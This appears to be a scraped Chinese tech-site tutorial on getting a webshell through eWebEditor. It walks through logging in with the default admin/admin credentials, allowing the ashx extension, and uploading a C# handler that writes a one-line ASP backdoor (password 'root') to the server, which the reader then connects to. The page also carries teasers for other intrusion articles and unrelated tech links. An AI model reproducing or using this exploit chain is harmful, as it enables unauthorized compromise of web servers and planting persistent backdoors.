eweb遇到asp被限制访问拿不了shell
今天看了前面的原创帖子说到eweb遇到asp,asa,cer被限制访问拿不了shell,正好这个问题我是知道的。应该很多大牛都会的吧,估计还是有些不会的,就将就看看吧
这是一个eweb入口(废话)
用默认帐户密码admin admin进入
样式添加asa扩展名
直接上传asp马
到这里都是顺利的,但是。。当你访问马的时候。。
试过了小马,一句话,会出现同样的问题
解决方法:
在样式添加里加上扩展名ashx
创建一个1.ashx的文件, 上传,代码如下:
复制代码
代码如下:
<%@ webhandler="" language="C#" class="Handler">
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
然后直接访问它。。它会在当前目录生成一个root.asp的一句话木马,密码为root
然后连接一句话木马就可以啦~~
拿到shell
什么是爆破?怎么修改跳转指令?
从本章开始,我们来一步一步学习Crack软件(80%读者昏死过去,且不省人世 另有20%在寻找附近可以用来打人的东西)不可不说一下学习破解的三个阶段:初级,修改程序,用ultraedit等工具修改exe文件,称暴力破解,简
详情2018-02-05 17:57:33责编:llp 来源:驱动管家
怎么用电炉抓肉鸡?电炉抓肉鸡有哪些步骤?
我用“电驴”抓肉鸡!!难道是放一个“电驴”在路上,等“火鸡”过来,一不小心踩在“电驴”上结果给烫熟了,结果就成“肉鸡”了。很多朋友说抓肉鸡很难,找好肉鸡就更难,其实也不然,关键就在于敢动脑子。没有
详情2018-01-20 16:46:53责编:llp 来源:驱动管家
中小型网站可以怎么拒绝服务攻击?从哪几个方面防备?
DoS(Denial of Service)是一种使用合理的效劳恳求占用过多的效劳资源,从而使合法用户无法得到效劳呼应的网络进犯行为。被DoS进犯时的表象大致有:* 被进犯主机上有很多等候的TCP衔接; * 被进犯主机的体系资
详情2018-02-01 09:35:26责编:llp 来源:驱动管家
怎么隐藏一句话木马?利用ntfs流隐藏你的一句话木马
这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!如下是ASP脚本的例子!NTFS流文件的内容如下
详情2018-01-19 12:30:40责编:llp 来源:驱动管家
zol中关村在线博客子站有漏洞?修复的方案是什么?
分析一下中关村的博客的漏洞
详情2018-01-22 14:37:53责编:llp 来源:驱动管家
远程访问软件radmin有哪些特点?怎么通过radmin得到服务器权限?
Radmin 是一款很不错的服务器管理,有以下特点:1、程序体积小巧,并且安装简单、配置容易。2、运行速度快,在10Mbps局域网的测试中,它比流行的VNC(Virtual Network Computing)要快,也超过了PcAnywhere。3、
详情2018-01-23 20:19:48责编:llp 来源:驱动管家
怎么避免网站被黑?网站被黑之后如何处理?
每当出现欧洲杯、世界杯、奥运会这种比赛时,各种博彩集团使出浑身解数黑掉正常的网站,尤其是流量大的资讯类网站。百度通过内部检测发现欧洲杯期间站点被黑数量呈上升趋势,百度已经加大惩罚效率和力度,那么,
详情2018-01-23 19:24:40责编:llp 来源:驱动管家
oracle数据库教程 电脑高手入侵oracle数据库有哪些常用的命令?
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1
详情2018-01-13 20:02:40责编:llp 来源:驱动管家
openbsd是什么?openbsd系统有什么漏洞?
受影响系统:OpenBSD OpenBSD 4 2OpenBSD OpenBSD 4 1OpenBSD OpenBSD 4 0描述:BUGTRAQ ID: 25984CVE(CAN) ID: CVE-2007-5365OpenBSD是一款开放源代码Unix类操作系统。OpenBSD系统的DHCP协议实现上存
详情2018-01-24 16:40:45责编:llp 来源:驱动管家
wordpress教程 教你修复存在wordpress4.0以下版本的跨站脚本漏洞?
该漏洞是由芬兰IT公司Klikki Oy的CEO Jouko Pynnonen发现的,只存在于Wordpress4 0以下的版本中。据调查得知全球有86%的Wordpress网站都感染了这一漏洞,也就意味着全球数百万的网站都存在着潜在的危险。一些
详情2018-01-20 14:28:46责编:llp 来源:驱动管家
- win8系统安装系统报错 提示“签名错误”
- 打开网页卡死是哪里出错了?打开网页卡死解决办法
- 米折忘记密码了怎么重置?米折密码重置方法
- 数码摄像机要怎么保养?数码摄像机保养的技巧
- 索尼w610这款家用的数码相机好不好?索尼w610的全方位介绍
- 搭载AI大脑的无人机能否充当无人机警察?
- find命令怎样和xargs命令一起组合使用
- linux系统删除大文件还是无法释放磁盘空间怎么解决
- 三星手机的呼叫转移怎么设置?设置呼叫转移的步骤
- 荣耀7i如何设置指纹接听,用指纹接听电话?
- 加密root文件系统 创建一个加密的ext3文件系统
- 百度导航好用还是百度地图好用?百度导航有哪些功能特点?
- 不想被人下载自己的视频怎么设置?小咖秀设置在哪儿?
- 索尼tx10相机各方面的性能怎么样?索尼tx10最全面的评价
- 尼康d600和尼康d610之间的这些区别你了解吗
- 文件夹如何设置权限?在win7电脑上对文件权限设置的方法详解
- 苹果电脑safari浏览器的右键都有哪些作用?
- 移动硬盘不显示是什么原因?要如何解决这种情况
- 打开应用程序 提示“该内存不能为read” 怎么解决?
- 荣耀9发布会在哪里看直播?荣耀9发布会在哪些网站直播?
